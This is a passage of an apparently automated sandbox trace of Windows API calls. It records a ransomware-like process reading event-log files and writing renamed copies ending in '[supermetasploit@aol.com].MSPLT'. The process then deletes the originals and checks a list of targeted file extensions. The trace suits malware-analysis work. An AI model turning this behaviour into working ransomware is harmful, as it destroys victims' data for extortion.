dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0288.342] GetLastError () returned 0x0 [0288.342] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.348] WriteFile (in: hFile=0x3d0, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.351] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.351] WriteFile (in: hFile=0x3d0, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x142, lpOverlapped=0x0) returned 1 [0288.351] SetEndOfFile (hFile=0x3d0) returned 1 [0288.352] CloseHandle (hObject=0x3d0) returned 1 [0288.356] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.356] SetEndOfFile (hFile=0x43c) returned 1 [0288.520] CloseHandle (hObject=0x43c) returned 1 [0288.545] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.546] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 1 [0288.546] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.546] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.546] lstrlenW (lpString=".doc") returned 4 [0288.546] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.546] lstrlenW (lpString=".docx") returned 5 [0288.546] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.546] lstrlenW (lpString=".pdf") returned 4 [0288.546] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.546] lstrlenW (lpString=".xls") returned 4 [0288.546] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.546] lstrlenW (lpString=".xlsx") returned 5 [0288.546] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.546] lstrlenW (lpString=".ppt") returned 4 [0288.546] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.546] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.546] lstrlenW (lpString=".zip") returned 4 [0288.547] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.547] lstrlenW (lpString=".rar") returned 4 [0288.547] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.547] lstrlenW (lpString=".bz2") returned 4 [0288.547] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.547] lstrlenW (lpString=".7z") returned 3 [0288.547] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.547] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.547] lstrlenW (lpString=".dbf") returned 4 [0288.547] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.547] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.547] lstrlenW (lpString=".1cd") returned 4 [0288.547] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.547] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.547] lstrlenW (lpString=".jpg") returned 4 [0288.547] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.547] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.547] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.547] lstrlenW (lpString=".doc") returned 4 [0288.547] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.547] lstrlenW (lpString=".docx") returned 5 [0288.547] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.547] lstrlenW (lpString=".pdf") returned 4 [0288.548] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString=".xls") returned 4 [0288.548] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString=".xlsx") returned 5 [0288.548] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.548] lstrlenW (lpString=".ppt") returned 4 [0288.548] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.548] lstrlenW (lpString=".zip") returned 4 [0288.548] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString=".rar") returned 4 [0288.548] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString=".bz2") returned 4 [0288.548] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString=".7z") returned 3 [0288.548] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.548] lstrlenW (lpString=".dbf") returned 4 [0288.548] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.548] lstrlenW (lpString=".1cd") returned 4 [0288.548] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0288.548] lstrlenW (lpString=".jpg") returned 4 [0288.548] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.549] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.549] lstrlenW (lpString="Microsoft-Windows-Bits-Client%4Operational.evtx") returned 47 [0288.549] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.549] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0288.549] CloseHandle (hObject=0x43c) returned 1 [0288.549] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 0x20 [0288.550] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.550] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.550] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.550] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.550] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0288.550] GetLastError () returned 0x0 [0288.551] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.558] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.561] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.562] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x132, lpOverlapped=0x0) returned 1 [0288.562] SetEndOfFile (hFile=0x37c) returned 1 [0288.562] CloseHandle (hObject=0x37c) returned 1 [0288.568] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.568] SetEndOfFile (hFile=0x43c) returned 1 [0288.570] CloseHandle (hObject=0x43c) returned 1 [0288.570] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.570] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 1 [0288.570] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.570] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.570] lstrlenW (lpString=".doc") returned 4 [0288.570] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString=".docx") returned 5 [0288.571] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.571] lstrlenW (lpString=".pdf") returned 4 [0288.571] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString=".xls") returned 4 [0288.571] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString=".xlsx") returned 5 [0288.571] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.571] lstrlenW (lpString=".ppt") returned 4 [0288.571] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.571] lstrlenW (lpString=".zip") returned 4 [0288.571] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString=".rar") returned 4 [0288.571] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString=".bz2") returned 4 [0288.571] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString=".7z") returned 3 [0288.571] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.571] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.571] lstrlenW (lpString=".dbf") returned 4 [0288.571] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.571] lstrlenW (lpString=".1cd") returned 4 [0288.571] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.571] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.571] lstrlenW (lpString=".jpg") returned 4 [0288.571] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.572] lstrlenW (lpString=".doc") returned 4 [0288.572] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString=".docx") returned 5 [0288.572] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.572] lstrlenW (lpString=".pdf") returned 4 [0288.572] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString=".xls") returned 4 [0288.572] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString=".xlsx") returned 5 [0288.572] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.572] lstrlenW (lpString=".ppt") returned 4 [0288.572] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.572] lstrlenW (lpString=".zip") returned 4 [0288.572] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString=".rar") returned 4 [0288.572] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString=".bz2") returned 4 [0288.572] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString=".7z") returned 3 [0288.572] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.572] lstrlenW (lpString=".dbf") returned 4 [0288.572] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.572] lstrlenW (lpString=".1cd") returned 4 [0288.572] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0288.572] lstrlenW (lpString=".jpg") returned 4 [0288.573] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.573] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.573] lstrlenW (lpString="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 49 [0288.573] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.573] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0288.573] CloseHandle (hObject=0x43c) returned 1 [0288.573] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 0x20 [0288.573] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.574] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.574] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0288.574] GetLastError () returned 0x0 [0288.574] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.941] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.946] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.946] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x136, lpOverlapped=0x0) returned 1 [0288.947] SetEndOfFile (hFile=0x37c) returned 1 [0288.955] CloseHandle (hObject=0x37c) returned 1 [0288.960] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.960] SetEndOfFile (hFile=0x43c) returned 1 [0288.963] CloseHandle (hObject=0x43c) returned 1 [0288.963] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.964] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 1 [0288.964] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.964] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.964] lstrlenW (lpString=".doc") returned 4 [0288.964] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.964] lstrlenW (lpString=".docx") returned 5 [0288.964] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.964] lstrlenW (lpString=".pdf") returned 4 [0288.964] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.964] lstrlenW (lpString=".xls") returned 4 [0288.964] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.964] lstrlenW (lpString=".xlsx") returned 5 [0288.965] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.965] lstrlenW (lpString=".ppt") returned 4 [0288.965] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.965] lstrlenW (lpString=".zip") returned 4 [0288.965] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.965] lstrlenW (lpString=".rar") returned 4 [0288.965] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.965] lstrlenW (lpString=".bz2") returned 4 [0288.965] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.965] lstrlenW (lpString=".7z") returned 3 [0288.965] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.965] lstrlenW (lpString=".dbf") returned 4 [0288.965] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.966] lstrlenW (lpString=".1cd") returned 4 [0288.966] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.966] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.967] lstrlenW (lpString=".jpg") returned 4 [0288.967] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.967] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.967] lstrlenW (lpString=".doc") returned 4 [0288.967] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.967] lstrlenW (lpString=".docx") returned 5 [0288.967] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.967] lstrlenW (lpString=".pdf") returned 4 [0288.967] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.967] lstrlenW (lpString=".xls") returned 4 [0288.967] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.967] lstrlenW (lpString=".xlsx") returned 5 [0288.967] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.967] lstrlenW (lpString=".ppt") returned 4 [0288.968] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.968] lstrlenW (lpString=".zip") returned 4 [0288.968] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.968] lstrlenW (lpString=".rar") returned 4 [0288.968] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.968] lstrlenW (lpString=".bz2") returned 4 [0288.968] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.968] lstrlenW (lpString=".7z") returned 3 [0288.968] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.968] lstrlenW (lpString=".dbf") returned 4 [0288.968] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.968] lstrlenW (lpString=".1cd") returned 4 [0288.968] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.968] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 57 [0288.968] lstrlenW (lpString=".jpg") returned 4 [0288.968] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.969] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.969] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 49 [0288.969] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.969] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0288.970] CloseHandle (hObject=0x43c) returned 1 [0288.970] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 0x20 [0288.970] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.970] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.970] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.970] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.970] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0288.971] GetLastError () returned 0x0 [0288.971] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0289.461] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0289.464] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0289.464] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x136, lpOverlapped=0x0) returned 1 [0289.464] SetEndOfFile (hFile=0x37c) returned 1 [0289.464] CloseHandle (hObject=0x37c) returned 1 [0289.467] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.467] SetEndOfFile (hFile=0x43c) returned 1 [0289.469] CloseHandle (hObject=0x43c) returned 1 [0289.469] 